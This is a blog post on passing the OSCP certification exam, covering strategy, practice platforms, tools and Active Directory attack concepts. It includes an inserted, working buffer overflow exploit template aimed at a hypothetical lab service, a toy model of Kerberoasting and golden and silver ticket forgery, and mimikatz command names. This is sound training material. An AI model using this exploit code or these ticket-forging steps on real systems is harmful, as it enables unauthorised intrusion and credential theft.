Passing OSCP 2021 within 12 hours

restdone
13 min read · Nov 27, 2021


Guide to a one-take pass

TL;DR

General Approach

  1. Order: BOF > Easy > Medium x2
  2. Choose a start time at which you are the most focused.
  3. Breaks and sugar are important.
  4. Time management is critical in the exam, because it is 100% certain you will get stuck somewhere.
  5. Time management is also critical because you need to produce a valid, thoughtful, copy-and-paste-able PDF report packed in 7z format. A report that does not meet the requirements gets no marks.

Exam experience and Try harder

  1. Try Harder
  2. There are no rabbit holes, as long as you know what you are doing.
  3. Practice BOF

Mindset preparation

  1. Try hard to keep it simple.
  2. Try hard to find something weird.
  3. Study the vulnerability.
  4. Don't give up.

Practice

  1. Note-taking and walkthrough-writing practice
  2. Support the community
  3. Hack The Box, TryHackMe, Proving Grounds list
  4. It is fine to read a walkthrough; just make sure you take something away from it.

Tool

  1. AutoRecon is good stuff.
  2. Master BOF, especially the practice rooms on TryHackMe. The example referenced here was an OSCP-level BOF plus privilege escalation box.
  3. HackTricks

Knowledge point in OSCP

  1. Tunneling
  2. Potatoes and PrintSpoofer
  3. Linux Exploit Suggester

Hope you can get it too!

Approach

I panicked before taking the exam even though I practised literally every minute I was not sleeping, because you have no idea about the true difficulty of the exam. I kept reading the following while trying to learn how hard it is:

Offensive Security Certified Professional is one of the hardest technical certifications, requiring the candidate to take a 24 hr long exam. Within 24 hours, the candidate must obtain at least 70 points from the 5 machines:

Buffer Overflow — 25 points

Easy Machine — 10 points

Medium Machine — 20 points x2

Hard Machine — 25 points

My exam approach

I saw many take the approach BOF > Hard > Medium. But personally, I feel more comfortable with the other order, BOF > Easy > Medium x2:

Because if you cannot kill the easy/medium ones easily, how can you kill the hard one within the time limit?

Time and Risk Management

I scheduled the exam for 1500 on 23 Nov 2021. I always sleep badly before anything critical, so I chose a late time slot so I could sleep a little in case I could not sleep the night before.

It turned out to be the right decision. I slept badly, and I could take a nap from 1200 to 1400. If I had picked 0900 or 1200, I can't imagine what it would have been like.

Following is the time consumed during the exam:

1hr30min: BOF flag

30min: Easy flag

1hr: Medium#1 user flag

2hr30min: Medium#1 root flag

4hr: Medium#2 user flag

2hr30min: Medium #2 root flag

6hr: Report writing

Time used to reach the OSCP passing points: ~12 hours

Ended the exam early. Total: ~18 hours

Hope you are powerful enough to choose both.

If I had taken the path of BOF > Hard, I am not sure I could have kept my focus on the medium boxes later. So it was the right decision, because the last medium, man, I felt it was trolling me and testing my "Try Harder". I thought I might be f**ked this time when I was struggling with Medium #2, both the user flag and the PE.

Not to mention, you need to complete the report.

From the exam guide, the highlighted requirement is:

You must get into the directory containing the flag, and show the root/admin account together with ipconfig/ifconfig.

But in fact, what's more, you need to provide a detailed step-by-step report with explanations and screenshots.

So what I did in the last 6 hours was make sure my steps could be executed by copy-and-paste and that all the screenshots were included.

Instead of writing the report the next day, I chose to do it while the VPN was still available, so I could reduce the risk of missing steps or screenshots.

Finally, convert the Word document to PDF, then 7z it and compute the MD5 hash.

Exam Experience and Try Harder


During the practice, we students always ask for hints, and most of the answers are "Try Harder". This is the magic phrase that is considered bullshit if you are the "ask for the answer" guy.

However, in my exam, my own "TRY HARDER" was tested.

//1 Buffer Overflow

This should have been done within 30 minutes, but I was using my own skeleton code and made some careless mistakes that caused it to fail. The pressure was on when it passed 1 hr and I had tried everything I knew, but TryHackMe gave me the confidence to know I was on the right track.

I tried harder by studying different kinds of BOF in the extra miles and on other platforms.

//2 Easy

After the heart-attack-inducing BOF, I finally engaged with the easy one. I could get a feel for what OSCP wants the candidate to know from this machine, and I enjoyed it. There was no rabbit hole, but it required determination to enumerate deeply.

I tried harder to enumerate manually based on the results of the automated tools.

//3 Medium #1

Based on the deep-enumeration idea you got from the easy box, you do the same deep enumeration on the medium one. The initial foothold was easy; what made it a little difficult was the enumeration after the foothold. So if you rely on existing automated tools, this exam can surely make you (me) feel unwell.

I tried harder to do the privilege escalation without automated tools.

//4 Medium #2

This was another level of enumeration and it tested my sense of the entry point: the vulnerable software was tricky and I spent a lot of time building the PoC myself. I also used up nearly all my reverts.

But luckily I found the entry after I cleared my mind.

I tried harder to set aside my preconceptions.

In general, if you have done enough practice on your own, you can identify the "rabbit holes". After the bloody PoC implementation, I finally got what it really was.

BOF is also of extremely high value for your practice. Once you have got it down, you can secure your 25 points almost instantly.

Mindset Preparation

It is important to prepare your mindset and your tools.

The mindset is your most important tool. It decides your approach, your method and your strategy. If you build up a reflex in your brain to ask "what is the answer" instead of "how do I find the answer", you will give up easily. Hence, I focused on building a way of doing pentests that I find comfortable.

#1 Methodology

Before starting a penetration test, I tried hard to learn "how and what is the methodology" so I could perform a systematic penetration test.

After that period, I started to find my own methodology. It actually came from a failed job interview:

Me: What is your methodology for conducting a pentest?

Interviewer: Try simple first.

This line has saved me every time I got stuck. Somehow my brain tends to complicate things, which caused me to overlook something.

I also built my own checklist:

But sooner or later I was doing those checks automatically before even looking at it, and now I only consult it once I have finished chasing whatever weird/interesting thing I found.

#2 Find weirds

When someone takes a piece of software and wants it to fit their needs, there must be some customization. I focused on finding and guessing at the weird parts.

I got used to running the automated tools first (e.g. nmap, AutoRecon, the PEAS scripts, pspy, the exploit suggesters, etc.). After reading many, many results, I have an idea of what a normal result looks like; anything that deviates from it can be an interesting vector.

It is also good practice to note down your findings and summarise them.

Following is my note-taking evolution: the notes became more and more focused over time.

I also write write-ups and summarise the findings so my brain has clues to recall when I see something similar next time. Although the vulnerabilities are different every time, there are similarities that trigger your imagination. From the theory of "learning", you need to leave some clues in your brain so you can recall them, especially when you want to find something weird.

#3 Study the vulnerability

EDB (Exploit-DB) makes it very convenient to find code and run it blindly. I have a habit of keeping and reading the source of the code, and usually the blog post behind it, to understand how it works. Otherwise you have no idea whether the target meets the requirements of your exploit or not.

I have encountered the same vulnerability in the same software with at least 2 kinds of exploit approaches targeting different Windows systems, but none of them matched my target. I needed to study further and make the necessary adjustments to make it work.

#4 Don’t Give up

Don’t give up

Practice

After preparing the mindset, let's see what practice you actually need to do to pass the OSCP exam.

#1 Note-taking and walkthrough-writing practice

Note-taking is freaking important. The way you take notes in practice is the way you will take notes during the exam, and your notes directly affect your understanding of the box and the material for your report.

I strongly advise using a note-taking tool such as CherryTree or OneNote.

Personally, I use OneNote. It has a user-friendly UI to manage notes from different practice platforms; it is easy to keep one section per platform.

For each section, I start a tab for each machine to track my progress and note down the takeaways.

It is also worth the time to write the lab report, at least the write-up part for the target machines, to develop your own comfortable template/style.

While writing the report, you will learn what you need to capture during note-taking and whether anything is missing from your notes. Remember the exam report requirements.

#2 Support community

It is strongly advised to join the Discord and the OSCP forum to talk with others; it helps during your tough times.

In the community, you will be both the one who looks for hints and the one who gives them.

The advantage of finding hints is obvious.

The advantage of giving hints is that you review your own report/notes to see whether they are repeatable. Some may even find another interesting path you did not try, like exploiting without Metasploit.

So, be nice and helpful =].

#3 Hack The Box, TryHackMe, OSCP PG

[Chart: passing rate vs. number of boxes pwned]

After 41 days, I finished all 75 lab machines and started looking for other labs to prepare for the exam. Following were the boxes I had done:

Before purchasing the OSCP, you can buy HTB VIP first to look at the retired machines and read the walkthroughs, so that you get a rough idea of the difficulty before paying for the OSCP lab and exam.

After Hack The Box, I found the way to approach the lab. IppSec's walkthroughs and videos were a tremendous help.

#4 Reading Walkthrough


While some encourage you not to read write-ups, that is impossible and makes learning slow.

I started with a bad, slow learning curve when I began HTB without reading walkthroughs. The concepts, the tools and the ideas I picked up were misunderstood. It was a painful period.

But now the market is more mature, with tutorials like the TryHackMe learning paths and HTB Academy.

I would suggest reading the write-up, but make sure you are hands-on with it and take something away. Otherwise you have just ruined yourself by relying on the write-up.

OSCP PG has a good mechanism for providing hints and walkthroughs.

Tools

Tools were critical to speed up my process. The following were critical to my exam:

#1 AutoRecon

It sped up almost 85% of my work by automatically running my enumeration commands. Simply start a Python HTTP server in the results directory to get a better view of the output.

#2 BOF template

I made myself a BOF template that handles the different BOF stages: fuzzing, locating EIP, controlling EIP, bad-character identification and the final exploit. Just toggle the function, update the content and follow the comments to make it work.
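The stages above, as an added example that is not the author's own template: pure helpers for each stage (cyclic pattern, offset lookup, bad-char buffer, payload assembly with a bad-char check on the return address) plus a small sender. The target host, port, command prefix, offset and JMP ESP address are assumed values for a hypothetical service; replace them with what your debugger shows.

```python
# Added example, not the author's template: helpers for the BOF stages named
# above (fuzz, locate EIP, control EIP, bad chars, exploit). Host, port, the
# vulnerable command prefix, the offset and the JMP ESP address are assumptions
# for a hypothetical target; replace them with your own values.
import socket
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style non-repeating pattern (Aa0Aa1Aa2...), max 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length exceeds 20280 bytes")


def pattern_offset(eip_hex, length=20280):
    """Offset of the 4 bytes that landed in EIP, as the debugger shows them
    (e.g. '61413161'). x86 is little-endian, so reverse before searching."""
    needle = bytes.fromhex(eip_hex)[::-1]
    idx = cyclic_pattern(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in the pattern")
    return idx


def all_chars(badchars=b"\x00"):
    """Bytes 0x01..0xff minus the ones already identified as bad. Compare the
    stack dump against this, add the first mangled byte to badchars, repeat."""
    return bytes(b for b in range(1, 256) if b not in badchars)


def build_payload(stage, fuzz_len=0, offset=0, jmp_esp=0,
                  badchars=b"\x00", shellcode=b"", nops=16):
    """Bytes to send after the command prefix for each stage of the template."""
    if stage == "fuzz":                       # growing buffer until the crash
        return b"A" * fuzz_len
    if stage == "offset":                     # crash with a cyclic pattern
        return cyclic_pattern(fuzz_len)
    if stage == "control":                    # EIP must read 42424242
        return b"A" * offset + b"BBBB" + b"C" * 16
    if stage == "badchars":                   # follow ESP in the debugger
        return b"A" * offset + b"BBBB" + all_chars(badchars)
    if stage == "exploit":
        ret = struct.pack("<I", jmp_esp)      # little-endian return address
        for blob, name in ((ret, "JMP ESP address"), (shellcode, "shellcode")):
            bad = [b for b in blob if b in badchars]
            if bad:                           # a mangled address never lands
                raise ValueError(f"{name} contains bad char {bad[0]:#04x}")
        return b"A" * offset + ret + b"\x90" * nops + shellcode
    raise ValueError(f"unknown stage {stage!r}")


def send_payload(host, port, prefix, payload, timeout=5):
    """Deliver one payload; True if the target answered, False on timeout or
    reset (the usual sign that the service crashed)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                      # banner, if any
            s.sendall(prefix + payload + b"\r\n")
            s.recv(1024)
            return True
    except (socket.timeout, ConnectionError, OSError):
        return False


def fuzz(host, port, prefix, step=100, limit=3000):
    """Send growing buffers; returns the length that killed the service."""
    for size in range(step, limit + 1, step):
        if not send_payload(host, port, prefix, build_payload("fuzz", fuzz_len=size)):
            return size
    return None


if __name__ == "__main__":
    # Assumed hypothetical target; real shellcode comes from msfvenom.
    TARGET, PORT, PREFIX = "10.10.10.10", 1337, b"OVERFLOW1 "
    print("crashed at", fuzz(TARGET, PORT, PREFIX))
    offset = pattern_offset("61413161")       # constructed EIP value
    print(build_payload("exploit", offset=offset, jmp_esp=0x625011AF,
                        badchars=b"\x00\x0a\x0d", shellcode=b"\xcc")[:16])
```

The bad-char check on the return address is the careless mistake that costs the most time on exam day: a JMP ESP address containing 0x0a or 0x0d is silently truncated by a line-based parser and EIP never lands where you expect, so the template refuses to build it rather than letting you stare at the debugger for an hour.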

#3 Hacktricks

The MVP of the whole journey. I took a lot from it.

Kernel exploit and Tunneling in OSCP

Although the OSCP lab covers most of the attacks, there are some kernel attacks, OS attacks and tunneling techniques that are worth considering when no effective vector has been found.

#1 Tunnel

Although the course material has a module on tunneling, I found the article from 0xdf more comfortable, especially when you don't want to set up an SSH key/password. Somehow I learned the concept of tunneling more comfortably from it.

I could then set up SSH tunnels more smoothly.

#2 Windows exploits: Potatoes and PrintSpoofer

If the foothold user has the SeImpersonatePrivilege privilege (check with whoami /priv), it is worth trying the above when no further vector can be identified.

#3 Linux Exploit Suggester, Dirty COW

A quick exploit checker based on the Linux kernel version. Useful in the OSCP journey, but a kernel exploit can crash the box and cost you a revert, so keep it as a last resort.

Summary — I Tried Harder

I scheduled my OSCP exam for 1500 on 23 Nov and ended it at 0800 on 24 Nov. I obtained the result at ~23:45 on 25 Nov.

I tried harder to practice: 75/75 labs, HTB, TryHackMe, OSCP PG.

I tried harder to prepare my mindset, set aside my preconceptions and enumerate the target hands-on.

I tried harder to prepare my tools, my notes and my walkthroughs well, to build my strategy.

I tried harder to help the community to reinforce my skills and ideas.

I tried harder to ask myself the right question.

I tried harder to do the difficult things.

I hope you can find your “Try Harder” and pass the OSCP.

Thanks nop (https://nop-blog.tech/) who helped me at the very early stage of OSCP.

Thanks Stefan for the chat.

And most importantly, my wife, who supported me without limit during my tough time.

Thank you for your reading. Hope you find it useful.

I registered for OSWE, starting 28 Nov.

BTW….

Offensive Security has just announced a change to the OSCP exam format. Instead of BOF, it will focus more on the AD chain penetration. Following are the materials I read during my OSCP practice.

[Mind map: extremely high-level view of how to approach Kerberos]

Following is the TL;DR of the purpose of each Kerberos step:

KDC → User: identification + session

The TGT is encrypted with the krbtgt key; the session key comes back encrypted with the user's key (derived from the user's password). That is what identifies the user and sets up the session.

User → Service: access

The service ticket (ST) is encrypted with the service account's key.

An ST can be requested by anyone who holds a TGT for any account with an SPN → request it and brute-force the service password offline = Kerberoast.

Knowing the service password, forge an ST = Silver Ticket.

Knowing the krbtgt password (hash), forge a TGT = Golden Ticket.

A user with pre-authentication disabled → the KDC hands out the AS-REP (encrypted with that user's key) to anyone who asks, so it can be brute-forced offline = AS-REP Roast.
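The flow above boils down to one rule: every ticket is sealed with the key of the party that must open it, so whoever holds that key can forge a ticket, and whoever holds a ticket can guess the key offline. The following added example (a toy model written for this page, not real Kerberos and not Impacket) plays both sides of the AS and TGS exchanges and then runs the four attacks named above against it. The accounts, passwords and wordlist are constructed, and the "encryption" is a stdlib stand-in (SHAKE keystream plus HMAC), not Kerberos' RC4/AES types.

```python
# Added example (toy model, not real Kerberos and not Impacket): the ticket flow
# above reduced to its key-ownership rule. Every ticket is sealed with the key
# of the party that must open it, so whoever holds that key can forge one, and
# whoever holds a ticket can guess the key offline. Accounts, passwords and the
# wordlist are constructed for this example; the "encryption" is a stdlib toy.
import hashlib
import hmac
import json
import os

PASSWORDS = {                       # constructed; krbtgt is not in the wordlist
    "krbtgt": "q7!Zp0x#Lm4vR",
    "alice": "Winter2021!",
    "svc_sql": "Summer2021",        # SPN account with a guessable password
    "svc_legacy": "Password1",      # "Do not require Kerberos preauthentication"
}
NO_PREAUTH = {"svc_legacy"}
WORDLIST = ["Password1", "Summer2021", "Winter2021!"]     # constructed


def derive_key(password, principal):
    """Stand-in for Kerberos string-to-key (PBKDF2 here, not the real KDFs)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), principal.encode(), 1000)


KEYS = {name: derive_key(pw, name) for name, pw in PASSWORDS.items()}


def seal(key, fields):
    """Toy authenticated encryption: SHAKE keystream XOR, then an HMAC tag."""
    data = json.dumps(fields, sort_keys=True).encode()
    nonce = os.urandom(16)
    stream = hashlib.shake_256(key + nonce).digest(len(data))
    ct = bytes(a ^ b for a, b in zip(data, stream))
    return nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()


def unseal(key, blob):
    """Raises ValueError unless `key` is the one used in seal()."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        raise ValueError("wrong key")
    stream = hashlib.shake_256(key + nonce).digest(len(ct))
    return json.loads(bytes(a ^ b for a, b in zip(ct, stream)))


def as_exchange(user, user_key=None):
    """AS-REQ/AS-REP: TGT sealed with the krbtgt key, plus the session key
    sealed with the user's key. Pre-auth means proving the user key first."""
    if user not in NO_PREAUTH and user_key != KEYS[user]:
        raise PermissionError("pre-authentication failed")
    session = os.urandom(16).hex()
    tgt = seal(KEYS["krbtgt"], {"user": user, "session": session})
    return tgt, seal(KEYS[user], {"session": session})


def tgs_exchange(tgt, service):
    """TGS-REQ/TGS-REP: any holder of a valid TGT gets an ST for any service,
    sealed with that service account's key."""
    info = unseal(KEYS["krbtgt"], tgt)
    return seal(KEYS[service], {"user": info["user"], "service": service})


def service_access(service, st):
    """The service trusts whatever its own key opens: returns the user name."""
    return unseal(KEYS[service], st)["user"]


def crack(blob, principal):
    """Offline guessing: the blob only validates under the right password."""
    for guess in WORDLIST:
        try:
            unseal(derive_key(guess, principal), blob)
            return guess
        except ValueError:
            continue
    return None


def kerberoast(attacker, attacker_key, service):
    tgt, _ = as_exchange(attacker, attacker_key)     # any domain user will do
    return crack(tgs_exchange(tgt, service), service)


def asrep_roast(user):
    _, enc_part = as_exchange(user)                  # no key needed at all
    return crack(enc_part, user)


def silver_ticket(service_password, service, impersonate):
    return seal(derive_key(service_password, service),
                {"user": impersonate, "service": service})


def golden_ticket(krbtgt_password, impersonate):
    return seal(derive_key(krbtgt_password, "krbtgt"),
                {"user": impersonate, "session": "forged"})


if __name__ == "__main__":
    print("kerberoast svc_sql ->", kerberoast("alice", KEYS["alice"], "svc_sql"))
    print("AS-REP roast svc_legacy ->", asrep_roast("svc_legacy"))
    st = silver_ticket("Summer2021", "svc_sql", "Administrator")
    print("silver ticket accepted as", service_access("svc_sql", st))
    tgt = golden_ticket(PASSWORDS["krbtgt"], "Administrator")
    print("golden ticket -> ST as", service_access("svc_sql", tgs_exchange(tgt, "svc_sql")))
```

Two things the model makes visible that the bullet list does not: the KDC never checks who asked for the ST, only that the TGT opens under the krbtgt key (so a forged TGT is indistinguishable from a real one, which is why the krbtgt hash is rotated twice after a compromise), and the service never talks to the KDC at all, so a silver ticket works even if the impersonated account does not exist. In a real domain the TGS-REP is cracked offline with hashcat or john rather than this loop, and only accounts with weak passwords fall to it.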

Kerberoast 101 is an hour-long video, but a really clear and easy-to-understand presentation of the basics. At least you can quickly get the idea of playing with and forging tickets.

If you understand the above, you understand the following as well:

Impacket needs no explanation.

Another great source of reading; I went to his blog a lot when I encountered AD attacks during practice.

BloodHound. You will want to know the shortest path to Domain Admin, or to an account that can run a DCSync attack, as a graph. I believe you do not want to hurt your eyes.

A tool to read LDAP. Another tool to protect your eyes.

Also, the HTB box Sauna comes to mind:

Also, the kiwi fruit (mimikatz):

KERBEROS::Golden and SEKURLSA::LogonPasswords provide great support during post-exploitation.

Hope it helps.
